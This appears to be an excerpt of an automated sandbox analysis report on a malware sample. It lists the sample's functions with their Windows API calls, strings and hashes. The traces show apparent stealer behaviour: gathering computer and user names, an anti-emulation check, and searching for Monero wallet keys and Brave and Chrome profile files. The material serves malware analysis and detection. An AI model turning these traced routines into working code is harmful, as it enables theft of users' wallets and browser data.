                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: 6ae7ed210da8c5b9820d40d9ffe3af2203132e5997e517094067ca69c096a645
                              • Instruction ID: 1b653c051b00136d40ecd615383c4d9003f8febc2ada86bfeeb1920f273223cb
                              • Opcode Fuzzy Hash: 6ae7ed210da8c5b9820d40d9ffe3af2203132e5997e517094067ca69c096a645
                              • Instruction Fuzzy Hash: BD0181B1A04208EBD710DF98DD85BAABBBCFB04B21F10421AFA45E7680C37459048BA2
                              Function 00321110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0032112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00321132
                              • ExitProcess.KERNEL32 ref: 00321143
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: 4715500cb45fcb7df496b6f406cce6f0d9b6782f6b47322d7d228defc08c3c7f
                              • Instruction ID: 92f66c899362117020d0a9e352d920e60c60e2c14511c3800e3aa25fe71cd75f
                              • Opcode Fuzzy Hash: 4715500cb45fcb7df496b6f406cce6f0d9b6782f6b47322d7d228defc08c3c7f
                              • Instruction Fuzzy Hash: 7CE0E670945348FBE7106BA4AD0AB097678EB14B01F104054F7097B1D0D6F52645AA99
                              Function 003210A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 003210B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 003210F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 066dd5887b72afb7a7700ced5af50f54bc20cb61a8232fc444fb4a0e39fa1d86
                              • Instruction ID: 25694bb7fa5ccf1271f2933bb188a52d4087fdab12344c01ddd42af8c8c75619
                              • Opcode Fuzzy Hash: 066dd5887b72afb7a7700ced5af50f54bc20cb61a8232fc444fb4a0e39fa1d86
                              • Instruction Fuzzy Hash: ABF02771641318BBE7149BA8AC49FBFB7ECE705B15F305448F504E7280D572AF44DAA0
                              Function 00321190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 003378E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00337910
                                • Part of subcall function 003378E0: RtlAllocateHeap.NTDLL(00000000), ref: 00337917
                                • Part of subcall function 003378E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0033792F
                                • Part of subcall function 00337850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003211B7), ref: 00337880
                                • Part of subcall function 00337850: RtlAllocateHeap.NTDLL(00000000), ref: 00337887
                                • Part of subcall function 00337850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0033789F
                              • ExitProcess.KERNEL32 ref: 003211C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: ed2a48753433a65663240951793fa538ee9b71c3b8c6fb1e8ed2f5d030b7e428
                              • Instruction ID: 630ebe7820db32b678270d7fb65046ba11dcca90a03de5378373e899d63dc4e8
                              • Opcode Fuzzy Hash: ed2a48753433a65663240951793fa538ee9b71c3b8c6fb1e8ed2f5d030b7e428
                              • Instruction Fuzzy Hash: 5BE012B591430953CE1173B8BD4BB2A339C9B34345F040425FA05EB212FAA5F8149967

                              Non-executed Functions

                              Function 003338B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 003338CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 003338E3
                              • lstrcat.KERNEL32(?,?), ref: 00333935
                              • StrCmpCA.SHLWAPI(?,00340F70), ref: 00333947
                              • StrCmpCA.SHLWAPI(?,00340F74), ref: 0033395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00333C67
                              • FindClose.KERNEL32(000000FF), ref: 00333C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: 1d16b51ba7eb5db1dc385e026c4821df5c73bee6a1593e7f5da8382b77a21d0e
                              • Instruction ID: 9dddfadb0482e9e54ca6f36ca35d6e8771bababd580a4ae484ad819d5eb6ea59
                              • Opcode Fuzzy Hash: 1d16b51ba7eb5db1dc385e026c4821df5c73bee6a1593e7f5da8382b77a21d0e
                              • Instruction Fuzzy Hash: 3DA101B1A002189BDB25DB64DC85FEA7379BF54300F048598F64DAB141EB75AB88CF62
                              Function 0032BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 0033A920: lstrcpy.KERNEL32(00000000,?), ref: 0033A972
                                • Part of subcall function 0033A920: lstrcat.KERNEL32(00000000), ref: 0033A982
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                              • FindFirstFileA.KERNEL32(00000000,?,00340B32,00340B2B,00000000,?,?,?,003413F4,00340B2A), ref: 0032BEF5
                              • StrCmpCA.SHLWAPI(?,003413F8), ref: 0032BF4D
                              • StrCmpCA.SHLWAPI(?,003413FC), ref: 0032BF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0032C7BF
                              • FindClose.KERNEL32(000000FF), ref: 0032C7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: 6533c49eaa843b210cd9dbbab08f4a4e3028e8221be198d3231bf28b7e4f2c29
                              • Instruction ID: e99975a8fd42d253da3eabc0f8e90b871212f3a2e087c4d2447ceb195d96a825
                              • Opcode Fuzzy Hash: 6533c49eaa843b210cd9dbbab08f4a4e3028e8221be198d3231bf28b7e4f2c29
                              • Instruction Fuzzy Hash: A1426172910108ABCB16FBA4DDD6EED737CAF54300F404558F94AAB181EF34AB49DB92
                              Function 00334910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 0033492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00334943
                              • StrCmpCA.SHLWAPI(?,00340FDC), ref: 00334971
                              • StrCmpCA.SHLWAPI(?,00340FE0), ref: 00334987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00334B7D
                              • FindClose.KERNEL32(000000FF), ref: 00334B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: 2d58a1364e2bc3b971f666ff690893a4693512e52e12c556bc26949e8c293e4e
                              • Instruction ID: 10c9310813c91ba9cf16725b72e6832be0b4f21e86331d3a7a5ec415f41f0484
                              • Opcode Fuzzy Hash: 2d58a1364e2bc3b971f666ff690893a4693512e52e12c556bc26949e8c293e4e
                              • Instruction Fuzzy Hash: 4B616871900218ABCB25EBA4DC85FEA73BCBB58700F044598F649A7141EB75EB89CF91
                              Function 00334570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00334580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00334587
                              • wsprintfA.USER32 ref: 003345A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 003345BD
                              • StrCmpCA.SHLWAPI(?,00340FC4), ref: 003345EB
                              • StrCmpCA.SHLWAPI(?,00340FC8), ref: 00334601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0033468B
                              • FindClose.KERNEL32(000000FF), ref: 003346A0
                              • lstrcat.KERNEL32(?,0109E908), ref: 003346C5
                              • lstrcat.KERNEL32(?,0109DCC0), ref: 003346D8
                              • lstrlen.KERNEL32(?), ref: 003346E5
                              • lstrlen.KERNEL32(?), ref: 003346F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: 23fea089ea197c95f92460b8e414d2f7549107999c0db732ff2c5660b1d4a560
                              • Instruction ID: 9b1cd182f9e72bd96e89f04b7beb693dfbe8dbd8f101a4217ec1809810a4f7a9
                              • Opcode Fuzzy Hash: 23fea089ea197c95f92460b8e414d2f7549107999c0db732ff2c5660b1d4a560
                              • Instruction Fuzzy Hash: 335157B1940218ABC725EB74DC89FED737CAB64700F404598F609A7150EBB4AB899F91
                              Function 00333EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00333EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 00333EDA
                              • StrCmpCA.SHLWAPI(?,00340FAC), ref: 00333F08
                              • StrCmpCA.SHLWAPI(?,00340FB0), ref: 00333F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0033406C
                              • FindClose.KERNEL32(000000FF), ref: 00334081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: c2cf5ba99d110b258ce0ef06a2c99ec38fa69c5c7c8c97db508d2821988356a9
                              • Instruction ID: 5eb3ed55a6817a81e3d6397d9cfe6e2a2239174db7da392885ea8859ba7a7061
                              • Opcode Fuzzy Hash: c2cf5ba99d110b258ce0ef06a2c99ec38fa69c5c7c8c97db508d2821988356a9
                              • Instruction Fuzzy Hash: AE5146B2900218ABCB25EBB4DC85FEE737CBB54700F404598F659A7040EB75EB899F91
                              Function 0032ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 0032ED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 0032ED55
                              • StrCmpCA.SHLWAPI(?,00341538), ref: 0032EDAB
                              • StrCmpCA.SHLWAPI(?,0034153C), ref: 0032EDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0032F2AE
                              • FindClose.KERNEL32(000000FF), ref: 0032F2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: f6fbb233d00c6d155360539b45be41107869bd5baa0e1f670133751515271015
                              • Instruction ID: 1ea20b68e10efea6ff2f86a524e30c767ca9fe4ab3c5dc843a3555b2970edfbc
                              • Opcode Fuzzy Hash: f6fbb233d00c6d155360539b45be41107869bd5baa0e1f670133751515271015
                              • Instruction Fuzzy Hash: 39E16572811618AADB56FB60DCD2EEE777CAF54300F4041D9B44A6A052EF306F8ADF51
                              Function 0032F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 0033A920: lstrcpy.KERNEL32(00000000,?), ref: 0033A972
                                • Part of subcall function 0033A920: lstrcat.KERNEL32(00000000), ref: 0033A982
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003415B8,00340D96), ref: 0032F71E
                              • StrCmpCA.SHLWAPI(?,003415BC), ref: 0032F76F
                              • StrCmpCA.SHLWAPI(?,003415C0), ref: 0032F785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0032FAB1
                              • FindClose.KERNEL32(000000FF), ref: 0032FAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
